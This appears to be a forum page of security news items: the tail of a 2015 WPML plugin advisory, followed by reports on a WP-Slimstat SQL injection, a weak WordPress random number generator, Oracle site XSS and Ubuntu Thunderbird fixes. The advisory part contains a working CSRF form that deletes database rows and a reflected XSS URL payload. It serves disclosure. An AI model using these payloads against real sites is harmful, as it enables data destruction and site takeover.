action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php"> <input type=hidden name="action" value="icl_msync_confirm"> <input type=text name="sync" size=50 value="del[x][y][12345]=z"> <input type=submit> </form> Submitting the above form would delete the row with the ID 12345 in the wp_posts database. Several items be deleted with the same request. 3. Reflected XSS The ”reminder popup” code intended for administrators in WPML didn’t check for login status or nonce. An attacker can direct target users to an URL like: https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f to execute JavaScript in their browser. This example bypasses the Chrome XSS Auditor. In the case of WordPress, XSS triggered by an administrator can lead to server-side compromise via the plugin and theme editors. CREDITS ======== The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while researching WordPress plugins falling in the scope of the Facebook bug bounty program. The vendor was notified on March 02, 2015 and the patch was released on March 10. Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/ An up-to-date version of this document can be found on our website http://klikki.fi . -- Jouko Pynnönen <jouko@iki.fi> Klikki Oy - http://klikki.fi Source
-
More than one million websites that run on the WordPress content management application run the risk of being completely hijacked by attackers exploiting critical vulnerability in most versions of a plugin called WP-Slimstat. Versions prior to the recently released Slimstat 3.9.6 contain a readily guessable key that's used to sign data sent to and from visiting end-user computers, according to a blog post published Tuesday by Web security firm Sucuri. The result is a SQL injection vector that can be used to extract highly sensitive data, including encrypted passwords and the encryption keys used to remotely administer websites. "If your website uses a vulnerable version of the plugin, you’re at risk," Marc-Alexandre Montpas, a senior vulnerability researcher at Sucuri, wrote. "Successful exploitation of this bug could lead to Blind SQL Injection attacks, which means an attacker could grab sensitive information from your database, including username, (hashed) passwords and, in certain configurations, WordPress Secret Keys (which could result in a total site takeover)." The WP-Slimstat secret key is nothing more than the MD5 hash of the plugin’s installation timestamp. An attacker could use the Internet Archive or similar sites to determine the year a vulnerable site was put online. That would leave an attacker with about 30 million values to test, an undertaking that could be completed in about 10 minutes. Once the secret key has been divined, the attacker can use it to pull data out of the database. WP-Slimstat is an analytics tool. Its listing on WordPress shows it has been downloaded more than 1.3 million times. People who operate websites that use the plugin should update immediately. Post updated to change headline. It previously read: More than1 million WordPress websites imperiled by critical plugin bug. Source
-
WordPress has become a huge target for attackers and vulnerability researchers, and with good reason. The software runs a large fraction of the sites on the Internet and serious vulnerabilities in the platform have not been hard to come by lately. But there’s now a new bug that’s been disclosed in all versions of WordPress that may allow an attacker to take over vulnerable sites. The issue lies in the fact that WordPress doesn’t contain a cryptographically secure pseudorandom number generator. A researcher named Scott Arciszewski made the WordPress maintainers aware of the problem nearly eight months ago and said that he has had very little response. “On June 25, 2014 I opened a ticked on WordPress’s issue tracker to expose a cryptographically secure pseudorandom number generator, since none was present,” he said in an advisory on Full Disclosure. “For the past 8 months, I have tried repeatedly to raise awareness of this bug, even going as far as to attend WordCamp Orlando to troll^H advocate for its examination in person. And they blew me off every time.” The consequences of an attack on the bug would be that the attacker might be able to predict the token used to generate a new password for a user’s account and thus take over the account. Arciszewski has developed a patch for the problem and published it, but it has not been integrated into WordPress. Since the public disclosure, he said he has had almost no communication from the WordPress maintainers about the vulnerability, save for one tweet from a lead developer that was later deleted. Arciszewski said he has not developed an exploit for the issue but said that an attacker would need to be able to predict the next RNG seed in order to exploit it. “There is a rule in security: attacks only get better, never worse. If this is not attackable today, there is no guarantee this will hold true in 5 or 10 years. Using /dev/urandom (which is what my proposed patch tries to do, although Stefan Esser has highlighted some flaws that would require a 4th version before it’s acceptable for merging) is a serious gain over a userland RNG,” he said by email. But, as he pointed out, this kind of bug could have a lot of value for a lot of attackers. “WordPress runs over 20% of websites on the Internet. If I were an intelligence agency (NSA, GCHQ, KGB, et al.) I would have a significant interest in hard-to-exploit critical WordPress bugs, since the likelihood of a high-value target running it as a platform is pretty significant. That’s not to say or imply that they knew about this flaw! But if they did, they probably would have sat on it forever,”Arciszewski said. WordPress officials did not respond to questions for this story before publication. Source
-
- arciszewski
- attacker
-
(and 3 more)
Tagged with:
-
Threat Level: High Severity: High CVSS Severity Score: 7.0 Impact Type: Complete confidentiality, integrity and availability violation. [2] Vulnerability: (1) Filtration Bypass. (3) Unauthenticated Cross Site scripting vulnerabilities. Description A malicious user could get unsuspecting visitors into divulging their credentials, to force a redirection to a heterogeneous third-party website, or to execute malicious code, on behalf of the attacker. An attacker can also fold malicious content into the content being delivered to visitors on the site. In this attack “Visitor -> Vendor” trust-levels are directly impacted, since the vendor’s website, and associated services , and products have high levels of trust by default. Read more: http://dl.packetstormsecurity.net/1501-advisories/Oracle_Website_Vulnerabilities119.pdf
-
Ubuntu has released a number of patches for security vulnerabilities in several versions of the OS, including some remote code execution flaws in Thunderbird, which is included with Ubuntu. Thunderbird is Mozilla’s email client, and the company recently fixed several memory corruption vulnerabilities, along with a cross-site request forgery bug and a flaw that could lead to a session-fixation attack. “If a user were tricked in to opening a specially crafted message with scripting enabled, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Thunderbird,” the Ubuntu advisory says, referring to the memory corruption vulnerabilities. The CSRF weakness in Thunderbird could be exploited if an attacker can get a user to open a malicious message while scripting is enabled. The session-fixation attack could occur under some circumstances if a user is connected to a malicious web proxy. In addition to the Thunderbird vulnerabilities, there are also patches for several other flaws in Ubuntu. One of the patches fixes a bug in libssh that could cause a denial of service. “It was discovered that libssh incorrectly handled certain kexinit packets. A remote attacker could possibly use this issue to cause libssh to crash, resulting in a denial of service,” the advisory says. There are also two vulnerabilities in the RPM package that could let a local attacker execute arbitrary code and a bug in libevent that could allow code execution in some cases. “Andrew Bartlett discovered that libevent incorrectly handled large inputs to the evbuffer API. A remote attacker could possibly use this issue with an application that uses libevent to cause a denial of service, or possibly execute arbitrary code,” the Ubuntu advisory says. Source